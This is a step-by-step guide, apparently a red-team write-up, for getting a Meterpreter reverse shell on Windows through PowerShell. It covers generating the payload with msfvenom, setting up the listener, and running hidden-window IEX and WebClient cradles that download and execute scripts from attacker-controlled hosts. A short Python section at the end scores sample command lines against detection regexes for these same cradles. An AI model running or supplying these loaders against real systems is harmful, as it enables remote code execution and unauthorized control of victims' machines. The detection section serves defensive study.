0. Loading methods

  Local load
    powershell.exe -ExecutionPolicy Bypass -NoExit -File shell.ps1
  Remote load straight into memory
    powershell.exe -nop -w hidden -c "IEX ((New-Object net.webclient).downloadstring('http://192.168.1.4/a.ps1'))"
    Powershell
    Invoke-Expression (New-Object System.Net.WebClient).DownloadString("http://192.168.5.1/shell.ps1")
  Remote download, then local execution
    powershell
    $client = New-Object System.Net.WebClient
    $client.DownloadFile('http://192.168.5.132/system', 'd:\system.exe')
    Start-Process 'd:\system.exe'

1. Generate the payload

    msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.1.4 lport=3333 -f psh -o shell.ps1


2. Start the listener

    handler -H 192.168.1.4 -P 3333 -p windows/x64/meterpreter/reverse_https


3. Execution methods

3.1 Local load

    powershell.exe -ExecutionPolicy Bypass -NoExit -File shell.ps1


3.2 Remote load

3.2.1 Set up the web server

Use the Apache2 that ships with Kali to set up the web environment, place the generated shell.ps1 payload in it, and confirm that it can be downloaded.
Web environment: http://192.168.1.4/1.ps1

3.2.2 Method one

    powershell.exe -nop -w hidden -c "IEX ((New-Object net.webclient).downloadstring('http://192.168.1.4/a.ps1'))"


3.2.3 Method two

    Powershell
    Invoke-Expression (New-Object System.Net.WebClient).DownloadString("http://192.168.5.1/shell.ps1")

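From the defender's side, every loader on this page leaves a distinctive PowerShell command line in process-creation telemetry (execution-policy bypass, hidden window, no profile, WebClient download followed by IEX or Start-Process). The script below is an added example, not part of the original write-up: it scores constructed sample command lines against those patterns and raises an alert above a weight threshold. The log format, host names, weights and threshold are assumptions for illustration.

```python
import re

# Constructed sample process-creation records (not real telemetry):
# each line is "<host> | <parent process> | <command line>".
SAMPLE_LOG = """\
ws01 | explorer.exe | powershell.exe -ExecutionPolicy Bypass -NoExit -File shell.ps1
ws01 | cmd.exe | powershell.exe -nop -w hidden -c "IEX ((New-Object net.webclient).downloadstring('http://192.168.1.4/a.ps1'))"
ws02 | powershell.exe | powershell.exe -Command Get-Process
ws02 | winword.exe | powershell $client = New-Object System.Net.WebClient; $client.DownloadFile('http://192.168.5.132/system','d:\\system.exe'); Start-Process 'd:\\system.exe'
ws03 | explorer.exe | powershell.exe -File Invoke-Backup.ps1
"""

# Detection rules: (name, pattern, weight). Patterns mirror the cradles shown
# on this page; weights are assumed values chosen for the example.
RULES = [
    ("exec_policy_bypass", re.compile(r"-ExecutionPolicy\s+Bypass", re.I), 3),
    ("hidden_window",      re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    ("no_profile",         re.compile(r"-nop(?:rofile)?\b", re.I), 1),
    ("iex_download",       re.compile(r"(?:IEX|Invoke-Expression)\b.*?Download(?:String|File)", re.I), 4),
    ("webclient_download", re.compile(r"Net\.WebClient.*?Download(?:String|File)", re.I), 3),
    ("http_in_cmdline",    re.compile(r"https?://", re.I), 1),
]
THRESHOLD = 3  # assumed alert threshold


def score_command(cmdline):
    """Return (total weight, names of matched rules) for one command line."""
    hits = [name for name, pat, _ in RULES if pat.search(cmdline)]
    score = sum(weight for name, _, weight in RULES if name in hits)
    return score, hits


def triage(log_text, threshold=THRESHOLD):
    """Parse the pipe-separated records and return an alert per suspicious command line."""
    alerts = []
    for line in log_text.splitlines():
        host, parent, cmdline = (part.strip() for part in line.split("|", 2))
        score, hits = score_command(cmdline)
        if score >= threshold:
            alerts.append({"host": host, "parent": parent, "score": score, "hits": hits})
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_LOG):
        print(alert)
```

Benign invocations (`-Command Get-Process`, a plain `-File` run without a policy bypass) score zero, while the hidden-window IEX cradle trips five rules at once.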